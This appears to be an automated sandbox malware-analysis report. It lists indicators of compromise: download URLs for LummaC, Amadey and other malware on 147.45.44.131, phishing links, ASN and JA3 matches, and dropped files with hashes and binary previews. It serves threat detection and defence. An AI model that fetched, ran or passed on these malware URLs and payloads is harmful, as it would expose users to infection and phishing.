147.45.44.131	ZjH6H6xqo7.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tvh53.exe
	nlJ2sNaZVi.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbh75.exe
	TZ33WZy6QL.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
	7IXl1M9JGV.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
	7IXl1M9JGV.exe	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/bhdh552.ps1
	Rechnung_643839483.pdf.lnk	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/cdeea.exe
	file.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gqgqg.exe
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	147.45.44.131/files/tpgl053.exe
	ptgl503.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gpto03.exe
	Suselx1.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/g5.exe
52.222.214.90	https://app.frame.io/presentations/8b00a85a-48d0-4e35-9ec0-b06df28345ab?component_clicked=digest_call_to_action&email_id=1fd40484-cb9c-48d9-827c-03c08178f9b1&email_type=pending-reviewer-invite	Get hash	malicious	Unknown	Browse
	https://go2skin.com/rust-events	Get hash	malicious	Unknown	Browse
	http://multiplant.alexisracing.co.uk/multiplant#172656e616c646f406d756c7469706c616e742e636f6d2e6175	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://lavender-rosamund-62.tiiny.site/	Get hash	malicious	Unknown	Browse	13.59.238.46
	sshd.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	SRT68.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://click.pstmrk.it/3s/bmxn8t84vg.gherapilta.shop%2F/ySDk/28y5AQ/AQ/e82f1f59-f734-42be-affb-895d81855fb4/1/pD2JDTOBnb	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	54.155.27.215
	sshd.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	SBO Catch up call pf.msg	Get hash	malicious	HTMLPhisher	Browse	18.194.24.71
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	3.78.69.82
	https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2&c=E,1,dm0BsgXKEvQ4zpCWn9a_2TfhSLR8cGZr1-6jweGjTe0este5fASkeQZVLyX1Cz6QCtMNdDqQcYMIspu_vSObo4Nb1k5TezzFhTJcItmtEfuL-cJkW8Q4C3U6rUA,&typo=1&ancr_add=1	Get hash	malicious	Unknown	Browse	13.213.221.104
	https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2	Get hash	malicious	Unknown	Browse	18.138.137.135
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	54.171.230.55
FREE-NET-ASFREEnetEU	tyhkamwdmrg.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81
	kyhjasehs.exe	Get hash	malicious	DCRat	Browse	147.45.47.156
	fkydjyhjadg.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81
	KBKHHYI29L.msi	Get hash	malicious	Amadey	Browse	147.45.47.167
	nklmpsl.elf	Get hash	malicious	Unknown	Browse	193.233.234.120
	https://docs.google.com/drawings/d/1rnJTD83ySW2kuilnF4J1ffAp0B5BM7BM0Nvi8F8BbSI/preview?pli=1HeatherMitchell-andrew.tokar@overlakehospital.org	Get hash	malicious	HTMLPhisher	Browse	147.45.178.112
	w3gnakXO9S.exe	Get hash	malicious	Raccoon Stealer v2	Browse	193.233.132.12
	TuohOGyKsk.exe	Get hash	malicious	Unknown	Browse	193.233.203.37
	TuohOGyKsk.exe	Get hash	malicious	Unknown	Browse	193.233.203.37
	ZjH6H6xqo7.exe	Get hash	malicious	LummaC	Browse	147.45.44.131

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	payload_1.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	52.222.214.90
	ky.ps1	Get hash	malicious	Unknown	Browse	52.222.214.90
	List of Required items xlsx.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	52.222.214.90
	ab.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	52.222.214.90
	script.vbs	Get hash	malicious	Unknown	Browse	52.222.214.90
	mg.vbs	Get hash	malicious	Unknown	Browse	52.222.214.90
	mj.ps1	Get hash	malicious	Unknown	Browse	52.222.214.90
	ap.ps1	Get hash	malicious	Unknown	Browse	52.222.214.90
	cu.ps1	Get hash	malicious	Unknown	Browse	52.222.214.90
	Scripts_Obfusque.vbs	Get hash	malicious	Unknown	Browse	52.222.214.90

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Qjsync.exe	UolJwovI8c.exe	Get hash	malicious	Unknown	Browse
	ONHQNHFT.msi	Get hash	malicious	Unknown	Browse
	es.hta	Get hash	malicious	Unknown	Browse
	BkTwXj17DH.exe	Get hash	malicious	Unknown	Browse
	TVr2Z822J3.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	9nobq4rqr0.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\smomwacaueqiut	UolJwovI8c.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7518093422029304
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0b:9JZj5MiKNnNhoxua
MD5:	830298517A9FE74DC75D69DD4E87DB7E
SHA1:	CA54EA36908B7389B711DEB82EE58CB8D6AB3E1C
SHA-256:	9E2091776C71555E9A06AF50EAC8DE880B8EC1783A8A7E380DFD1583F4BE64E8
SHA-512:	F56B5A3C3D147D11D3F92799C79DE28EBC43B9634D57D7612651A9BDDFC61C7C334C34CC2CABD2A1CA44544B58B29437165E45EBF98FD9AC658FE2F69429F1BD
Malicious:	false
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x882708fd, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7555903866046987
Encrypted:	false
SSDEEP:	1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL
MD5:	BA69EDA5AD3696ED3343847F57C5FC51
SHA1:	0C9C03D50F3BBA656A8D502BFA72D2F77DED659F
SHA-256:	6131AACECE38C98CC3EE44F5C2270B15309D7BB9E4244786B09C808513D6D875
SHA-512:	2AC4016DBA38FF22820C642446C5385C865280C41CE5E9771BF1A18DD54EE4EB30D64BF0B0EF402DE58D454DF5E372E1B9487B2B608860AE439C8CEA7D3B597B
Malicious:	false
Preview:	.'..... .......7.......X\...;...{......................0.e......!...{?.2(...\|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{.....................................82(...\|...................pv2(...\|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07913245383327644
Encrypted:	false
SSDEEP:	3:9S6YegCpZWF73NaAPaU1lTDXtAlluxmO+l/SNxOf:9dzlCTNDPaU7jtAgmOH
MD5:	A470AE69762B9BB46E37435406A4FE28
SHA1:	FFD9629227D587F4869C5358121C326650761869
SHA-256:	E782ED1365D842C1599FEC65DAF573846931814ACB250173A60657AA8BAE5FFA
SHA-512:	94C11E19BE6E1D0017404CAF9C34161BE71E1C5A203F08739FF5E87192FD4A2CB07DF564C0DD14A1E7C6488EC2916C60F883A9BCAC1D66E48818F054DB9B2320
Malicious:	false
Preview:	x7.P.....................................;...{..2(...\|...!...{?..........!...{?..!...{?..g...!...{?...................pv2(...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379736180876081
Encrypted:	false
SSDEEP:	48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z8vUyus:tLHyIFKL3IZ2KRH9Ouggs
MD5:	C3CBD37B4CB25480E8A9DEBF614A920A
SHA1:	0FFFD1530A494152CE63A8B2399FA3AD5E640291
SHA-256:	9A4CFAD646186DD05A3E31C75D156712D31875B068FF198D1F956496821376C1
SHA-512:	534CA1A15A827081730EE6EF00ADB3E976B0720B4DC1A3AC34F71F622B1D1541C90257B8900C10E363BF03891242F42699ADE0B5F34019771D2E625A69BE9CC3
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Amatol_20241205054016.log

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	943
Entropy (8bit):	5.340510768632689
Encrypted:	false
SSDEEP:	24:g5gnybAIeLLzBq6Pg5gnCp5gndgcP2e5gndgcP295gbcP2Ra9RmU5gbcP2u5gbcf:gqn0xYBsqnyqnd39qnd32qOb9RmUqOlJ
MD5:	D11E1EB3A64C60E7BC94D2D199C4B93D
SHA1:	05DD880A7A7A4261CDED217EE443540E654CA00E
SHA-256:	82B8A0385AEF2303E0F0003A0FC892E594F5A8E9FB8871E404F0D6433CFFBE15
SHA-512:	4EA54258A823B58B86437CFF26313889F2DCFDF115B552525C2102E6CD79424E0498E7110322D87B149D1C946E0699E1C74CC5360D2FA828DB45ABD0C2B38B2F
Malicious:	false
Preview:	[1A10:1620][2024-12-05T05:40:15]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe..[1A10:1620][2024-12-05T05:40:15]i009: Command Line: '-burn.clean.room=C:\Windows\Temp\AppsLo.exe -burn.filehandle.attached=524 -burn.filehandle.self=532'..[1A10:1620][2024-12-05T05:40:15]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Windows\Temp\AppsLo.exe'..[1A10:1620][2024-12-05T05:40:15]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Windows\Temp\'..[1A10:1620][2024-12-05T05:40:16]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Amatol_20241205054016.log'..[1A10:1620][2024-12-05T05:40:16]i000: Setting string variable 'WixBundleName' to value 'Amatol'..[1A10:1620][2024-12-05T05:40:16]i000: Setting string variable 'WixBundleManufacturer' to value 'Fluoroscopy'..

C:\Users\user\AppData\Local\Temp\Qjsync.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2364728
Entropy (8bit):	6.606009669324617
Encrypted:	false
SSDEEP:	49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
MD5:	967F4470627F823F4D7981E511C9824F
SHA1:	416501B096DF80DDC49F4144C3832CF2CADB9CB2
SHA-256:	B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
SHA-512:	8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: UolJwovI8c.exe, Detection: malicious, Browse Filename: ONHQNHFT.msi, Detection: malicious, Browse Filename: es.hta, Detection: malicious, Browse Filename: BkTwXj17DH.exe, Detection: malicious, Browse Filename: TVr2Z822J3.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 9nobq4rqr0.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o\|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................\|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0a1wb0ac.eoa.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdrqximq.55i.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1wuh0n0.od0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwnrvxkx.ejs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\bbqnedcfmy

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	2675200
Entropy (8bit):	6.744603008468154
Encrypted:	false
SSDEEP:	49152:bTDTVe6BhhQQrTyEjMhn/w2EdU0Oz+E2TQVXmqtRSfoMBBMItgxmQjvVsYcjc9t/:bzVx6RKXURWpyTVnsG
MD5:	0010FDBCAF786DF07A883F8405F1B7B9
SHA1:	D6B90796CA9E7C5E4D106D5DA7426CAC5ED6184D
SHA-256:	4DC391901FC16D55F7E2616BD0B4A38792702F9FA96DE43067EBF11F357EBC42
SHA-512:	A27D5A8FE800F01EE0E41356E0DF06981C298EA8B585C9C50E0CFD2CD28C75A6C2BDD18064A30C1722F0C88F700DA7AB165AD8AC35FC6495577F5EED83AF101E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\caf5babf

Download File

Process:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
File Type:	data
Category:	dropped
Size (bytes):	5772470
Entropy (8bit):	7.7569445688191445
Encrypted:	false
SSDEEP:	98304:fkzblpufTfupwF4KE4LpaYAftGoJ//LLwBPPALUDp5pX7nlBxTJK8ELkdbNc8o23:WemVj/DsHWqX9bm3Qcy
MD5:	2EEF6A61D918AED6F61594C493E7ACC5
SHA1:	320F5A1C18BA1AB4BA483485860C269B2CFDDF48
SHA-256:	2B47134BE6D3627C9E8DF6FB52BD1D7C239C6922CD1F7349B9592ADC7CD4F188
SHA-512:	59DB1BA0B5E5E11559A6F8A6504A29F3FE5E5BB5B86B2DF3BD300DA6086C3975D614B432E30AB647F3D1C1C28E0122C7934FB950372305D97DD806678CD3AE87
Malicious:	false
Preview:	..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF

C:\Users\user\AppData\Local\Temp\dkxfiwecupyge

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 5 09:40:28 2024, mtime=Thu Dec 5 09:40:28 2024, atime=Thu Nov 28 12:29:44 2024, length=8504936, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	5.025473757605391
Encrypted:	false
SSDEEP:	24:8h/mgqcDSklXUCAvIe5szOnLAlGQUjDpZm:8xJqcDllteIOn8MjD/
MD5:	E82FE63483BF7ABD4C8BF0049D4660AD
SHA1:	39D19358677593DDDAFA166D5EAA456A7824312F
SHA-256:	88A37BE59F3AFDDE2DBAF48E19AB1BF80F66BF15079B0AC073DA63695AA82163
SHA-512:	272F1CDAFC7438266386C84E5592EF2B2D8A68F545521A84D2CA0BC95F31E797B00AA8AB565ADE072657F78F884EA66520FB0C8812978B22815494AEB784CB75
Malicious:	false
Preview:	L..................F.... .......G......G.......A..h........................:..DG..Yr?.D..U..k0.&...&.......$..S........G..`..&.G......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.T...........................^.A.p.p.D.a.t.a...B.V.1......Y.U..Roaming.@......EW<2.Y.U..../.........................R.o.a.m.i.n.g.....Z.1......Y.U..GZManage..B......Y.U.Y.U....f.....................#V..G.Z.M.a.n.a.g.e.....l.2.h..\|Y.k .THUNDE~1.EXE..P......Y.U.Y.U....s.........................t.h.u.n.d.e.r.b.i.r.d...e.x.e.......i...............-.......h..............d.....C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe..&.....\.....\.R.o.a.m.i.n.g.\.G.Z.M.a.n.a.g.e.\.t.h.u.n.d.e.r.b.i.r.d...e.x.e.`.......X.......571345...........hT..CrF.f4... .Kl.Y.....-...-$..hT..CrF.f4... .Kl.Y.....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\e02535b7

Download File

Process:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
File Type:	data
Category:	dropped
Size (bytes):	5772470
Entropy (8bit):	7.756944364366695
Encrypted:	false
SSDEEP:	98304:VkzblpufTfupwF4KE4LpaYAftGoJ//LLwBPPALUDp5pX7nlBxTJK8ELkdbNc8o23:AemVj/DsHWqX9bm3Qcy
MD5:	80F8CF50485313727A7E2A7148931880
SHA1:	30C25F1957772823369CAD6C15BA974A9042BB4F
SHA-256:	5BEA9F0925CB8A3F485E92DC50EAE97E5DED6B886AC0E19C70CA002EC18C70C8
SHA-512:	2889598203EB62E5B31B1BD9E0B1182F1325630D27026CF0629276F6CDEA22C453E38E66910B0E7087B6F0BA0DC7770059453CF0AF8E7A83B8BD8BF2E955AAFE
Malicious:	false
Preview:	..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF

C:\Users\user\AppData\Local\Temp\edd2ae6c

Download File

Process:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
File Type:	data
Category:	dropped
Size (bytes):	5772470
Entropy (8bit):	7.756944129461584
Encrypted:	false
SSDEEP:	98304:EkzblpufTfupwF4KE4LpaYAftGoJ//LLwBPPALUDp5pX7nlBxTJK8ELkdbNc8o23:jemVj/DsHWqX9bm3Qcy
MD5:	4393CFA75B7239058BBC9D1E3CD7C838
SHA1:	A3098EFF3BEB2FB6A06A615D48D5BC24F9789AD0
SHA-256:	554DA6A575798B079CF8667F31EDA6121FFD398C573F3A28ED9B73A23CA71743
SHA-512:	B7CFFD961C870B0F2229A3FCD50B33795D4DDEF80E3AF8FE638F49816AE4C035B8B438193FE03791C92A5BE3808CA692D7DF2D5A19581A5C4BFD5AD95821DAA4
Malicious:	false
Preview:	..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF

C:\Users\user\AppData\Local\Temp\smomwacaueqiut

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2675200
Entropy (8bit):	6.745223583528521
Encrypted:	false
SSDEEP:	49152:YTDTVe6BhhQQrTyEjMhn/w2EdU0Oz+E2TQVXmqtRSfoMBBMItgxmQjvVsYcjc9t/:YzVx6RKXURWpyTVnsG
MD5:	74F8644C5185C908D81B778B03068120
SHA1:	B0FAAC424A2E1881BD8E1D26E8F4B069CF689763
SHA-256:	72812A162F9450320A80589A4D432BFAB8C168D199D60783E7792705BD3981D7
SHA-512:	3058310B4A4510C0B85C51839EB1AEC734F5A9C61EA648CCFD5BBDDF72CBF90439AD4B4F889EC503E38087D1E33DA4C8CE99CE03D07727902A563BAB8EAF86D6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Joe Sandbox View:	Filename: UolJwovI8c.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...,..T.................<&...(..b..W..........@............................../.....YD)...`... ..............................................P/.p...../.8.....(.Pj............/...............................(.(...................PQ/..............................text....:&......<&.................`..`.data........P&......@&.............@....rdata......p'......Z'.............@..@.pdata..Pj....(..l....'.............@..@.xdata...R....(..T...^(.............@..@.bss.... a....(..........................idata..p....P/.......(.............@....CRT....0....`/.......(.............@....tls.........p/.......(.............@....rsrc...8...../.......(.............@..@.reloc......../.......(.............@..Butage........./.......(.............@...................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\js3250.dll

Download File

